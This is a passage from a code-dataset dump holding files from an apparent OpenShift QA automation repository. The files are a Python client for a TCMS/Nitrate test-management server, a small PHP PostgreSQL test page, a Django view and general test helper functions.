os.getenv('TCMS_PASSWORD')\n if (tcms_user is None) or (tcms_passwd is None):\n raise Exception(\"Missing TCMS login information in your env variables...\")\n ret_code = os.system(\"echo \\\"%s\\\" | kinit %s\" % (tcms_passwd, tcms_user))\n if ret_code != 0 :\n print \"Error: kinit failed!, ret_code is: %s\" % ret_code\n\n\n\nclass TCMS(object):\n ns = None\n test_plan_cases = None # total number ot testcases with this testplan\n prod_name = 'OpenShift 2.0'\n #prod_name = 'OpenShift Flex'\n host = 'https://tcms.engineering.redhat.com/xmlrpc/'\n #test_plan_name = 'Test Plan for OpenShift 2.0'\n test_plan_name = 'PPP_sandbox3'\n tcms_time = datetime.datetime.now()\n plan_id = None\n #tcms_time = datetime.datetime.now() + timedelta(hours=15)\n\n def __init__(self, product=None, test_plan=None, host=None):\n run_kinit()\n if product:\n self.prod_name = product\n if host:\n self.host = host\n if test_plan:\n self.test_plan_name = test_plan\n \n # do a kinit just in case.\n n = NitrateKerbXmlrpc(self.host)\n self.ns = n.server\n # get product information\n print (\"Getting information from testplan '%s'\" % self.test_plan_name) \n #self.info(\"xxx\", 1)\n self.test_plan = self.ns.TestPlan.filter({'name': self.test_plan_name})[0]\n self.plan_id = self.test_plan['plan_id']\n self.builds = self.get_builds()\n ### for a testplan with many cases, this can take a while, don't do it on init\n #self.test_plan_cases = self.ns.TestPlan.get_test_cases(self.test_plan['plan_id'])\n #print(\"TestPlan '%s', Number of testcases: %s\" % (test_plan, len(self.test_plan_cases))) \n\n def get_test_runs(self, plan_id=None):\n if plan_id == None:\n plan_id = self.test_plan['plan_id']\n\n runs = self.ns.TestPlan.get_test_runs(plan_id)\n return runs\n \n def get_product_version_id(self):\n prod_version_id = None\n versions = self.ns.Product.get_versions(self.test_plan['product_id'])\n for version in versions:\n if version['value'] == self.test_plan['default_product_version']:\n prod_version_id = version['id']\n return prod_version_id\n \n def get_components(self):\n components = self.ns.Product.get_components(self.prod_name)\n return components\n\n def get_builds(self):\n builds = self.ns.Product.get_builds(self.prod_name)\n return builds\n \n def create_build(self, params):\n return self.ns.Build.create(params)\n\n\n def get_build_id(self, build_name):\n res = self.ns.Build.check_build(build_name, self.prod_name)\n if res.has_key('args'): \n build_id = None\n else:\n build_id = self.ns.Build.check_build(build_name, self.prod_name)['build_id']\n return build_id\n\n def check_and_insert_build(self, build_name):\n \"\"\" helper function, insert a build by name if it does not exists in\n TCMS \"\"\"\n build_id = self.get_build_id(build_name)\n if build_id:\n return build_id\n else:\n # no build match found, insert it.\n build_params = {'product': self.prod_name, 'name': build_name,\n 'description': build_name}\n return self.create_build(build_params)\n\n def get_testcases_by_plan(self, plan_name, params):\n filter_dict = {'plan__name': plan_name}\n filter_dict = dict(filter_dict.items() + params.items())\n ts_list = self.ns.TestCase.filter(filter_dict)\n print(\"There is a total of %s testcases within plan %s\" % (len(ts_list),\n filter_dict['plan__name']))\n return ts_list\n \n def get_testcases(self, params={}):\n ts_list = self.get_testcases_by_plan(self.test_plan_name, params)\n self.testcases = ts_list\n return ts_list\n \n TestCases = property(get_testcases, None)\n\n\n def get_testcases_by_tag(self, tag_name, params=None):\n filter_dict = {'tag__name': tag_name, 'plan__name': self.test_plan_name}\n #filter_dict = {'tag__name': tag_name, 'plan': self.plan_id}\n res = self.ns.TestCase.filter(filter_dict)\n return res\n\n def get_testscripts_by_tag(self, tag_name):\n test_scripts = []\n filter_dict = {'tag__name': tag_name, 'plan__name': self.test_plan_name}\n #filter_dict = {'tag__name': tag_name, 'plan': self.plan_id}\n tests = self.ns.TestCase.filter(filter_dict)\n for test in tests:\n script = test['script'].split('.py')[0].replace(\"/\", \".\")\n args = test['arguments']\n case_id = test['case_id']\n test_scripts.append((script, args, case_id))\n return test_scripts\n\n def get_test_runs_by_build(self, build_name):\n build_id = self.get_build_id(build_name)\n runs = self.ns.Build.get_runs(build_id)\n return runs\n\n\n def get_testcases_by_components(self, comp_name):\n plan_id = self.test_plan['plan_id']\n filter_dict = {'component__name': comp_name, 'plan': plan_id}\n #testcases = {}\n ts_list = self.ns.TestCase.filter(filter_dict)\n print(\"Component: %s, testcases: %s\" % (comp_name, len(ts_list)))\n return ts_list\n\n def get_testcase_by_script_name(self, script_name):\n plan_id = self.test_plan['plan_id']\n filter_dict = {'script' : script_name}\n ts_list = self.ns.TestCase.filter(filter_dict)\n print(\"ts_list: %s\" % ts_list)\n return ts_list[0]\n\n def get_case_ids_by_components(self, comp_name):\n \"\"\" return a list of testcases's id \"\"\"\n tc_list = self.get_testcases_by_components(comp_name)\n tc_id_list = []\n for tc in tc_list:\n tc_id_list.append(tc['case_id'])\n return tc_id_list\n\n def get_testcases_with_variants(self):\n \"\"\"\n return a list of testcases that contain the variants in its argument\n XXX: unfortunately, TestCase.filter does not support arguments yet.\n \"\"\"\n plan_id = self.test_plan['plan_id']\n filter_dict = {'arguments__icontain': 'variants', 'plan': plan_id}\n ts_list = self.ns.TestCase.filter(filter_dict)\n return ts_list\n\n def get_testcase_arguments(self, testcase_id):\n res = self.ns.TestCase.get(testcase_id)\n variants = []\n if res['arguments']:\n arg = eval(res['arguments'])\n if arg.has_key('variants'):\n variants = arg['variants']\n return variants\n\n def get_variants_mapping(self, testcase_ids):\n testcase_variants = {}\n print testcase_ids\n for testcase_id in testcase_ids:\n if testcase_id:\n variants = self.get_testcase_arguments(testcase_id)\n if len(variants) > 0:\n testcase_variants[testcase_id] = variants\n return testcase_variants\n\n\n def get_plan_runs(self, plan_name):\n # first get plan info\n plan_dict = self.ns.TestPlan.filter({'name': plan_name})[0]\n plan_id = plan_dict['plan_id']\n test_runs = self.ns.TestPlan.get_test_runs(plan_id)\n self.test_plan_cases = self.ns.TestPlan.get_test_cases(plan_id)\n return test_runs\n \n\n def get_daily_runs(self, target_date=None):\n \"\"\" return all the runs done on a daily bases, the the target_date is\n empty, then default to to \n XXX: please note that the server is based in Beijing, China...so \n have to take care of time difference\n \"\"\"\n tcms_time = self.tcms_time\n\n if target_date is None:\n # default to today, but since the data server is located in\n # Beijing, we need to compensate, for the first cut, assume we are\n # running the job in California, so the difference is 15 hrs.\n end_date = (tcms_time + timedelta(days=1)).strftime(\"%Y-%m-%d\")\n start_date = tcms_time.strftime(\"%Y-%m-%d\")\n else:\n date_format = \"%Y-%m-%d\"\n start_date = target_date\n sd = datetime.datetime.strptime(target_date, date_format)\n end_date = (sd + datetime.timedelta(days=1)).strftime(date_format)\n\n run_filter = {\n 'plan' : self.test_plan['plan_id'], \n #'stop_date__gte': (start_date)\n 'stop_date__range': (start_date, end_date)\n }\n print(\"%s\" % run_filter)\n daily_runs = self.ns.TestRun.filter(run_filter)\n\n return daily_runs\n\n Components = property(get_components)\n Builds = property(get_builds)\n #TestPlan = property(get_test_plan)\n \n def create_testrun(self, test_id_list, build_version, summary, test_run_id=None):\n \"\"\"\n can be used by test scripts to create a test run into TCMS system.\n each individual testcase run is attached to a top level test run and\n therefore a TestRun entry into the system is needed \n \n +-------------------+----------------+-----------+------------------------------------+\n | Field | Type | Null | Description |\n +-------------------+----------------+-----------+------------------------------------+\n | plan | Integer | Required | ID of test plan |\n | build | Integer/String | Required | ID of Build |\n | manager | Integer | Required | ID of run manager |\n | summary | String | Required | |\n | product | Integer | Required | ID of product |\n | product_version | Integer | Required | ID of product version |\n | default_tester | Integer | Optional | ID of run default tester |\n | plan_text_version | Integer | Optional | |\n | estimated_time | TimeDelta | Optional | HH:MM:MM |\n | notes | String | Optional | |\n | status | Integer | Optional | 0:RUNNING 1:STOPPED (default 0) |\n | case | Array/String | Optional | list of case ids to add to the run |\n | tag | Array/String | Optional | list of tag to add to the run |\n +-------------------+----------------+-----------+------------------------------------+\n \"\"\"\n build_info = self.check_and_insert_build(build_version)\n if build_info is dict:\n build_id = build_info['build_id']\n else:\n build_id = build_info\n #build_id = self.check_and_insert_build(builds[0]['build_id']\n prod_version_id = self.get_product_version_id()\n run_res = None\n if summary:\n summary_note = summary\n else:\n summary_note = 'TestRun create via XML-RPC'\n if test_run_id is None:\n params = {\n 'plan' : self.plan_id,\n 'build' : build_id, #'unspecified',\n 'manager' : self.test_plan['author_id'],\n 'product' : self.test_plan['product_id'],\n 'summary' : summary_note,\n 'product_version':prod_version_id, #self.test_plan['default_product_version']\n \n }\n run_res = self.ns.TestRun.create(params)\n test_run_id = run_res['run_id']\n # step2. create the actual testrun based on test_id\n testcase_run_res = []\n for test_id in test_id_list:\n input_params = {\n 'run' : test_run_id,\n 'case' : test_id,\n 'build' : build_id,\n }\n case_run_res = self.ns.TestCaseRun.create(input_params)\n testcase_run_res.append(case_run_res)\n return (testcase_run_res)\n\n \n ######################################################################\n # action reponses\n # these class methods in response to the user option.action\n ######################################################################\n \n def get_latest_runs(self, test_ids):\n \"\"\"\n testcase_ids: is a list of test ids that you want to filter \n\n \"\"\"\n tcms_time = datetime.datetime.now()\n date_format = \"%Y-%m-%d\"\n target_date=self.test_plan['create_date']#tcms_time.strftime(\"%Y-%m-%d\")\n target_date = '2011-08-17'\n #print(\"TARGET_DATE: %s\" % target_date)\n #target_date=tcms_time.strftime(\"%Y-%m-%d\")\n #self.info('xxx', 1) \n params = {\n 'case__case_id__in': test_ids, \n #'case__summary__icontain': \"El Nath\",\n #'case_run_id' : 692230\n #'running_date__gt' : target_date,\n #'close_date__gt': target_date\n }\n #'notes': 'El Nath'}\n print(\"params: %s\" % params)\n res = self.ns.TestCaseRun.filter(params)\n new_res = []\n ###########################################\n # XXX : need to filter out by testplan\n ############################################\n if len(res) > len(test_ids):\n # testcases ran more than once get unique_run_id and put it into an array, the latest should have an id that's the biggest\n run_list = []\n target_run_id = None\n for result in res:\n run_id = result['run_id']\n test_run = self.ns.TestRun.get(run_id)\n if test_run['plan_id'] == self.test_plan['plan_id']:\n run_list.append(run_id)\n target_run_id = run_list\n \n #params = {'run': target_run_id, 'case__case_id__in': test_ids,\n # 'case_run_status__in': [1, 2, 3, 4, 5]\n # } # pass or fail\n new_res.append(result) #self.ns.TestCaseRun.filter(params)\n #self.info(\"xxx\", 1)\n else:\n new_res = res\n #self.info(\"xx\", 1)\n return new_res\n\n def get_testcase_id_by_script_name(self, script_name):\n #self.info(\"xxx\", 1)\n if '.' in script_name: # already in good form\n script_name = script_name.replace('.', '/') + \".py\"\n\n filter_val = {'script': script_name , 'plan': self.plan_id}\n print filter_val\n try:\n res = self.ns.TestCase.filter(filter_val)[0]\n except:\n name = script_name.replace('.', '/') + \".py\"\n filter_val = {'plan': self.plan_id, 'script': name}\n try:\n res = self.ns.TestCase.filter(filter_val)[0]\n except:\n res = None\n if res:\n return res['case_id']\n else:\n return None\n\n def get_testcase_ids(self, tests):\n \"\"\"\n given a list of RHTEST TestEntry object, retrieve a list of TCMS testCase IDs\n \"\"\"\n testcases_dict = {}\n testcases = [] # array of test\n for test in tests:\n test_name = test.inst.__module__\n if test.args: # there are arguments it's a tuple (variant, case_id)\n case_id = test.args[1]\n else: # no arguemnt\n case_id = self.get_testcase_id_by_script_name(test_name)\n testcases_dict[case_id] = test_name\n testcases.append(case_id)\n return (testcases, testcases_dict)\n\n def get_testrun(self, run_id):\n return self.ns.TestRun.get_test_case_runs(run_id)\n\n def get_testcaserun(self, tc_run_id):\n return self.ns.TestCaseRun.filter({'case_run_id': tc_run_id})\n \n def update_testcaserun(self, caserun_id, params):\n return self.ns.TestCaseRun.update(caserun_id, params)\n \n def update_testrun(self, run_id, params):\n return self.ns.TestRun.update(run_id, params)\n\n def create_testrun_from_script(self, script_name,\n build_version='unspecified'):\n \"\"\"\n create a test run in TCMS based on the testcase ID which we get with\n\n \"\"\"\n testcases = []\n case_id = self.get_testcase_id_by_script_name(script_name)\n testcases.append(case_id)\n res = self.create_testrun(testcases, build_version)\n return res\n \n def create_testcaserun(self, params):\n \n \"\"\"\n should be called after a top level testRun has been created\n \"\"\"\n pass\n\n def dump_testcases_to_json_by_tag(self, tag_name, write_to_file=False):\n \"\"\" dumps out the testcase to a json format given the tcms tag name \"\"\"\n import json\n output_name = tag_name + \".json\"\n testcases = self.get_testcases_by_tag(tag_name)\n json_output = json.dumps(testcases)\n #json_output = json.dumps(testcases, indent=4)\n if write_to_file:\n fd = open(output_name, 'w')\n fd.write(json_output + \"\\n\")\n fd.close()\n return (json_output, len(testcases))\n\n def extract_testcases_from_json(self, json_data):\n \"\"\" given a json formated testcase data, extract all of the testcase ids\"\"\"\n testcase_data = json.loads(json_data)\n for testcase in testcase_data:\n self.info(\"xxx\", 1)\n\n def get_testcases_str_by_tag(self, tag_name):\n testcases = self.get_testcases_by_tag(tag_name)\n json_ouput = json.dumps(testcases, indent)\n return testcases\n\n\n def get_tags_in_testplan(self, test_plan_id=None, tag_name = None):\n if test_plan_id is None:\n test_plan_id = self.plan_id\n \n tags = self.ns.TestPlan.get_tags(test_plan_id)\n\n # tag is a dictionary of id, name {'id': 344, 'name': 'migration'}\n if tag_name:\n for tag in tags:\n if tag['name'] == tag_name:\n return tag\n else:\n return tags\n\n def get_case_tags(self, test_plan_id=None, tag_name=None):\n if test_plan_id is None:\n test_plan_id = self.plan_id\n\n case_tags = self.ns.TestPlan.get_all_cases_tags(test_plan_id)\n casetags = []\n tags_obj = []\n\n for case_tag in case_tags:\n if tag_name:\n if case_tag['name'] == tag_name:\n casetags.append(case_tag['name'])\n tags_obj.append(case_tag)\n return case_tag['name'], case_tag\n else: \n casetags.append(case_tag['name'])\n tags_obj.append(case_tag)\n\n return casetags, tags_obj\n\n \n#######################\n# helper functions\n#######################\n\ndef construct_json_obj(script_str):\n \"\"\" given a script string convert it into a JSON object \"\"\"\n json_repr = None\n json_dict = None\n if script_str.endswith(\".py\"):\n # it's a python file\n json_dict = {\"python\" : script_str}\n elif script_str.endswith(\".rb\") or script_str.endswith(\".feature\"):\n # it's a ruby/cucumber file\n json_dict = {\"ruby\": script_str}\n io = StringIO() \n json.dump(json_dict, io)\n json_str = io.getvalue()\n return (json_str, json_dict) \n\n\ndef convert_python_script_to_json(test_obj, tcms_obj):\n script_json = None\n json_dict = None\n script_name = test_obj['script'].strip()\n try:\n script_json = json.loads(script_name)\n except:\n # the existing string is not a JSON string. construct \n script_json, json_dict = construct_json_obj(script_name)\n if json_dict:\n if json_dict.has_key('python'):\n param = {'script': script_json}\n res = tcms_obj.ns.TestCase.update(test_obj['case_id'], param)\n \n print \"ID: %s, OLD: %s, NEW: %s\" % (test_obj['case_id'], script_name, script_json)\n\ndef convert_json_to_python_script(test_obj, tcms_obj):\n \"\"\" reverse of convert_python_script_to_json \"\"\"\n script_python = None\n try:\n script_json = json.loads(test_obj['script'])\n except:\n script_json = None\n \n if script_json:\n script_python = script_json['python']\n\n param = {'script': script_python}\n res = tcms_obj.ns.TestCase.update(test_obj['case_id'], param)\n print \"ID: %s, OLD: %s, NEW: %s\" % (test_obj['case_id'], script_json, script_python)\n\ndef update_script_field_to_json_format(tcms_obj=None, testcase_id=None):\n if tcms_obj is None:\n ### XXX change this to openshift 2.0 once fully tested\n tcms_obj = TCMS(test_plan='ppp_sandbox3') #openshift 2.0')\n\n script_json = None\n if testcase_id is None:\n # go through the entire testplan looking for automated and confirmed\n params = {'is_automated': 1, 'case_status': 2}\n tests = tcms_obj.get_testcases(params)\n for test in tests:\n convert_python_script_to_json(test, tcms_obj)\n else:\n test = tcms_obj.ns.TestCase.get(testcase_id)\n convert_python_script_to_json(test, tcms_obj)\n\ndef revert_script_field_to_python_format(tcms_obj=None, testcase_id=None):\n \"\"\"\n undo update_script_field_to_json_format\n\n \"\"\"\n if tcms_obj is None:\n ### XXX change this to openshift 2.0 once fully tested\n tcms_obj = TCMS(test_plan='ppp_sandbox3') #openshift 2.0')\n\n script_python = None\n if testcase_id is None:\n # go through the entire testplan looking for automated and confirmed\n params = {'is_automated': 1, 'case_status': 2}\n tests = tcms_obj.get_testcases(params)\n for test in tests:\n convert_json_to_python_script(test, tcms_obj)\n else:\n test = tcms_obj.ns.TestCase.get(testcase_id)\n convert_json_to_python_script(test, tcms_obj)\n\n\n\ndef extract_script_field(script_field):\n \"\"\" given a testcase's script field information, extract the script path \"\"\"\n try:\n script_json = json.loads(script_field)\n except:\n # the existing string is not a JSON string. construct \n pass \n if not script_json.has_key('python'): \n return script_field\n else:\n return script_json['python']\n\ndef test():\n n = NitrateKerbXmlrpc('https://tcms.engineering.redhat.com/xmlrpc/')\n ns = n.server\n\n user = ns.User.get_me()\n #components = ns.Product.get_components('OpenShift Flex')\n #i = 0\n #for comp in components:\n # i += 1\n # print \"COMP %s: %s\" % (i, comp['name'])\n filter_val = {'script': 'demo/simple_demo.py'}\n #resp = ns.TestCase.filter(filter_val)\n filter_val = {'plan__name' : 'PPP'}\n res = ns.TestRun.filter(filter_val)\n #res = ns.TestRun.filter({'run_id': 23373})\n testcase_id = int(res[0]['case_id'])\n ts_run_vals = {\n 'case': testcase_id\n }\n self.info('xxx', 1)\n res = ns.TestCaseRun.create(ts_run_vals)\n\n self.info(\"xx\", 1)\n # get builds by product\n builds = ns.Product.get_builds(PROD)\n # get build_id_by_name\n build_name = '31afead'\n build_id = ns.Build.check_build(build_name, PROD)['build_id']\n runs = ns.Build.get_runs(build_id)\n \n filter_val = {'build': build_id, 'case_run_status': '2'}\n cases_p = ns.TestCaseRun.filter(filter_val)\n filter_val = {'build': build_id, 'case_run_status': '3'}\n cases_f = ns.TestCaseRun.filter(filter_val)\n\n\n\n\nif __name__ == '__main__':\n revert_script_field_to_python_format()\n self.info(\"xxx\", 1)\n #test()\n tcms = TCMS(test_plan='Test Plan for OpenShift 2.0')\n name = 'fwtest_simple'\n res = tcms.get_case_tags(tag_name=name)\n self.info('xxx', 1) \n res = tcms.dump_testcases_to_json_by_tag('manual_run')\n tc_list = tcms.extract_testcases_from_json(res)\n self.info('xx',1)\n #tcms = TCMS(test_plan='ppp_sandbox3')\n res = tcms.get_testcase_id_by_script_name('RT/security/qpid_binding_stage.py')\n #tests = tcms.get_testscripts_by_tag('test_variants')\n testcase_ids = [161932]\n build_version = 'devenv_1808'\n summary = '2012_05_31-14:20:36_QPIDbinding'\n\n tcms.create_testrun(testcase_ids, build_version, summary)\n self.info(\"xxx\", 1)\n #tests = tcms.get_testcases_by_tag('collections')\n #from datetime import time\n #total_seconds = 2332.333\n #params = {'status': 1, 'estimated_time_seconds': total_seconds }\n #res = tcms.update_testrun(38273, params)\n tests = tcms.get_testcase_id_by_script_name('Collections/Demo/Demo01.py')\n\n self.info('xxx', 1)\n tests = tcms.get_testcases()\n tc_ids = []\n for test in tests:\n if test['arguments']:\n tc_ids.append(test['case_id'])\n\n #tests = tcms.get_testcases_by_plan('Test Plan for OpenShift 2.0')\n variants_dict = tcms.get_variants_mapping(tc_ids) \n for k, v in variants_dict.items():\n print \"%s: %s\" % (k, v)\n #tcms.dump_testcaes_to_json_by_tag('quick_smoke')\n self.info('xxx', 1)\n #name = a[0]['script'].split('.py')[0].replace(\"/\", \".\")\n\n #res = tcms.check_and_insert_build('devenv_1651')\n #self.info(\"xxx\", 1)\n #res = tcms.get_testcase_id_by_script_name('demo/simple_demo.py')\n # XXX assume we have run this step already caserun id is 846534, testrun ID is '33030'\n #res = tcms.create_testrun_from_script('demo/simple_demo.py')\n #TEST_RUN_ID = 33030\n run_list = tcms.get_testrun(TEST_RUN_ID)\n for run in run_list:\n tc_run = tcms.get_testcaserun(run['case_run_id'])\n case_run_params = {'case_run_status': FAILED}\n run_params = {'status': FINISHED}\n tcms.update_testrun(TEST_RUN_ID, run_params)\n res = tcms.update_testcaserun(run['case_run_id'], case_run_params)\n self.info('xx', 1)\n #res = tcms.ns.Product.get_versions(281)\n #version_id = tcms.get_product_version_id()\n\n components = tcms.Components\n #tests = {}\n #total_tests = 0\n #tcms.get_testcases_by_plan(3396)\n \"\"\"\n res_list = tcms.get_testcases_by_components('Admin::Rsync')\n for res in res_list:\n print res['case_id']\n \"\"\"\n #for i, comp in enumerate(components):\n # #print \"%04s: %s\" % (i, comp['name'])\n # test_cases = tcms.get_testcases_by_components(comp['name'])\n # tests[comp['name']] = test_cases\n # total_tests += len(test_cases)\n #print \"Total test cases within test plan: %s\" % total_tests\n\n #test_runs = tcms.get_plan_runs('Furud SP1')\n #build_name = '31afead'\n #runs = tcms.get_test_runs_by_build(build_name)\n #user_profile = tcms.User.get_me()\n #components = tcms.Product.get_components('OpenShift Flex')\n\n #test()\n" }, { "alpha_fraction": 0.664536714553833, "alphanum_fraction": 0.6677316427230835, "avg_line_length": 61.599998474121094, "blob_id": "37a80f0fc1207bd0c5a5159a1bea201b1d3c7ae8", "content_id": "e0cf9da729e6f16b3cfc6908ccd31b76ff42ebc0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 626, "license_type": "no_license", "max_line_length": 333, "num_lines": 10, "path": "/automation/open/testmodules/RT/cartridge/app_template/postgresql/php/data1.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\nheader('Content-Type: text/plain');\n$con = pg_connect(\"dbname=\".$_ENV[\"OPENSHIFT_APP_NAME\"].\" \".\"user=\".$_ENV[\"OPENSHIFT_POSTGRESQL_DB_USERNAME\"].\" \".\"password=\".$_ENV[\"OPENSHIFT_POSTGRESQL_DB_PASSWORD\"].\" \".\"host=\".$_ENV[\"OPENSHIFT_POSTGRESQL_DB_HOST\"].\" \".\"port=\".$_ENV[\"OPENSHIFT_POSTGRESQL_DB_PORT\"]) or die('Could not connect to the database: ' + pg_last_error());\n\npg_query($con, \"DROP TABLE IF EXISTS info;\");\npg_query($con, \"CREATE TABLE info(id integer PRIMARY KEY, data text);\");\npg_query($con, \"INSERT INTO info VALUES(1, '#str_random1#');\");\npg_close($con);\necho \"Please visit /show.php to see the data\";\n?>\n" }, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 30, "blob_id": "0266fbc558ed1044847d7cb71ae638e12044e919", "content_id": "7b16025e1b9f62de515ea7001aa0520cb109b2bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 155, "license_type": "no_license", "max_line_length": 59, "num_lines": 5, "path": "/automation/open/testmodules/RT/cartridge/app_template/django_custom/mydiyapp/djangotools/views.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from django import VERSION\nfrom django.http import HttpResponse\n\ndef display_version(request):\n return HttpResponse(VERSION, content_type='text/plain')\n" }, { "alpha_fraction": 0.5546044111251831, "alphanum_fraction": 0.5607691407203674, "avg_line_length": 31.645463943481445, "blob_id": "a802b9c36a29043f78dc643cd8a2185b28d2f484", "content_id": "b5cef3dd2119c95f3d488f56263a3492e58e383d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 31307, "license_type": "no_license", "max_line_length": 280, "num_lines": 959, "path": "/automation/open/lib/common/misc.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import time, os, subprocess, sys, re\nimport OSConf\nimport pexpect\nimport json\nimport openshift #rest api\nimport shutil\nimport random\nfrom consts import CONNECT_TIMEOUT\nfrom helper import *\n\n\ndef env_setup(cleanup=True):\n \"\"\"Prepares environment for running a case by:\n * setting up proxy if necessary\n * removing SSH_AUTH_SOCK variable\n * deleting all apps if cleanup==True\n \"\"\"\n # Default\n #http_proxy='file.rdu.redhat.com:3128'\n\n if os.environ.has_key(\"OPENSHIFT_http_proxy\"):\n http_proxy=os.getenv(\"OPENSHIFT_http_proxy\").strip()\n if http_proxy != '' and http_proxy != 'None':\n #os.putenv(\"http_proxy\", http_proxy)\n os.environ[\"http_proxy\"]=http_proxy\n\n if os.environ.has_key(\"http_proxy\"):\n print \"---http_proxy: %s---\" %(os.getenv(\"http_proxy\"))\n else:\n print \"---no http_proxy---\"\n\n os.environ[\"HOME\"] = os.path.expanduser(\"~\")\n #os.putenv(\"HOME\", os.path.expanduser(\"~\"))\n remove_env(\"SSH_AUTH_SOCK\")\n #print os.environ[\"SSH_AUTH_SOCK\"]\n try:\n if cleanup:\n return clean_up()\n except:\n pass\n return 0\n\ndef set_env(key, value):\n print \"Setting %s=%s in os.environ\" %(key, value)\n os.environ[key]=value\n return 0\n\ndef remove_env(key):\n if os.environ.has_key(key):\n print \"Unsetting %s in os.environ\" %(key)\n os.environ.pop(key)\n return 0\n\n\ndef get_git_repo_size(app_name):\n \"\"\"\n This function returns the git repo size in KiloBytes\n \"\"\"\n ( ret_code, ret_output ) = run_remote_cmd(app_name, \"du -sk git/%s.git\" % ( app_name ))\n obj = re.search(r\"^(\\d+)\\s+git\", ret_output)\n if ret_code == 0 and obj is not None:\n return obj.group(1)\n else:\n raise Exception((\"Unable to parse the size of git repo from the output.\"\n \"(Maybe remote app/dir doesn't exist, \"\n \"or problems with SSH connection)\"))\n\n\ndef user_info(user_email=None, user_passwd=None, data_source_from_s3=False):\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n '''\n if data_source_from_s3 == True:\n #TODO: What was this s3 good for?\n # I WOULD LIKE TO REMOVE TO AVOID CONFUSION\n print \"Getting user info from s3\"\n if OSConf.initial_conf() != 0:\n return 1\n '''\n return OSConf.get_apps()\n\n\ndef get_app_url_from_user_info(app_name, user_email=None, user_passwd=None, data_source_from_s3=False):\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n apps_dict = user_info(user_email, user_passwd, data_source_from_s3)\n if apps_dict.has_key(app_name):\n return apps_dict[app_name]['url']\n print apps_dict\n print \"In user info, nothing about %s is found\" %(app_name)\n return None\n\n\ndef grep_web_page(url, regular_expression, options={},\n delay=7, count=7, strong=True):\n '''\n Fetch a page and grep it. \n * if the page cannot be fetched/accessed then returns 254\n * elif matches - returns 0\n * otherwise - returns 1\n\n [02/03/2012] Added extended version for matching string. \n `strong` argument means that all of the RE must be found.\n [24/04/2012] Added condition, when curl is not able to fetch the url - it will return 254\n '''\n pattern = ''\n patterns = []\n if isinstance(regular_expression, str) or isinstance(regular_expression, unicode):\n pattern = re.compile(regular_expression, re.M)\n log.info((\"Trying to find all the strings matching regular expression\"\n \" '%s' in %s\")% (regular_expression, url))\n elif isinstance(regular_expression, tuple) or isinstance(regular_expression, list):\n for p in regular_expression:\n patterns.append(re.compile(p, re.M))\n else:\n raise TypeError(\"Wrong type of 2nd argument. Possible types: string or list/tuple\")\n\n #fetch_cmd = \"curl %s '%s'\" % (options, url)\n # Retry 4 times\n retcode = 1\n\n #old curl support\n if isinstance(options, str):\n obj = re.search(re.compile(\"-u\\s+['\\\"]?([^:]+):([^\\s'\\\"]+)\"), options)\n if obj:\n options = get_auth_headers(obj.group(1), obj.group(2))\n\n for i in range(count):\n time.sleep(delay)\n output = fetch_page(url, options)\n\t#print \"**>>\"*30\n\t#print \"url : %s\"%url\n\t#print \"options : %s\"%options\n\t#print \"output : %s\"%output\n\t#print \"**<<\"*30\n #(retcode, output) = command_getstatusoutput(fetch_cmd, quiet = True)\n if output is not None:\n retcode = 0\n if (isinstance(regular_expression,str) \n or isinstance(regular_expression, unicode)):\n result = pattern.findall(output)\n if result != []:\n log.debug(\"Found results: %s\"% result)\n return 0\n else: # list or tuple\n summ = 0\n for p in patterns:\n result = p.findall(output)\n if result != []:\n summ += 1\n if strong: #AND\n if summ == len(patterns):\n print \"All of the patterns have been found\"\n return 0 #success\n else:\n continue\n else: #OR\n if sum(summ)>0: #at least one was found\n print \"At least one of the patterns have been found\"\n return 0\n else:\n continue\n if retcode == 0:\n return 1\n else:\n log.warning(\"Unable to access %s\"% url)\n return 254\n\ndef check_web_page_output(app_name, path='', pattern='Welcome to'):\n app_url = OSConf.get_app_url(app_name)\n return grep_web_page(\"%s/%s\" % ( app_url, path ), pattern)\n\ndef multi_subprocess(command_list=[]):\n sub_comm_dict={}\n sub_ret_dict={}\n for i in command_list:\n a = subprocess.Popen(i, stdin=open(os.devnull,'rb'), shell=True)\n sub_comm_dict[a]=i\n sub_ret_dict[a]=a.poll()\n\n ret_dict={}\n while len(sub_ret_dict)>0:\n print \"sleep 5 seconds, will check again\"\n time.sleep(5)\n\n for j in sub_ret_dict.keys():\n ret=j.poll()\n if ret != None:\n sub_ret_dict.pop(j)\n ret_dict[sub_comm_dict[j]] = ret\n #else:\n #print \"Command {%s} is running.\" %sub_comm_dict[j]\n return ret_dict\n\n\ndef _ssh_keygen(passphrase=\"\"):\n if not os.path.exists('~/.ssh/id_rsa'):\n command = \"ssh-keygen -N '' -f ~/.ssh/id_rsa\"\n ret = subprocess.call(command, shell=True)\n if ret != 0:\n return 1\n else:\n return 0\n else:\n print 'Warning: the ~/.ssh/id_rsa key already exist and will not be overwritten.'\n return 0\n\n\n\n#@exclusive\ndef prepare_libra_sshkey():\n print \"Preparing libra ssh key\"\n if not os.path.exists(os.path.expanduser(\"~/.ssh/id_rsa\")) or not os.path.exists(os.path.expanduser(\"~/.ssh/id_rsa.pub\")):\n print \"~/.ssh/id_rsa or ~/.ssh/id_rsa.pub is not existing\"\n if not os.path.exists(os.path.expanduser(\"~/.ssh/id_rsa\")) or not os.path.exists(os.path.expanduser(\"~/.ssh/id_rsa.pub\")):\n print \"~/.ssh/id_rsa or ~/.ssh/id_rsa.pub is not existing\"\n print \"Generating new ssh key\"\n ret = _ssh_keygen()\n if ret != 0:\n print \"ssh ken gen failed\"\n sys.exit(1)\n\n else:\n print \"id_rsa and id_rsa.pub are existing in local host\"\n\n\ndef command_getstatusoutput(command, quiet = False, timeout=COMMAND_TIMEOUT):\n return cmd_get_status_output(command, quiet, timeout)\n\n \ndef command_get_status(command, timeout=COMMAND_TIMEOUT, quiet=False):\n return cmd_get_status(command, timeout, quiet)\n\n\ndef clean_up(user_email=None, user_passwd=None):\n \"\"\"Remove all applications and cleans up cache\"\"\"\n if user_email is None:\n (user_email, 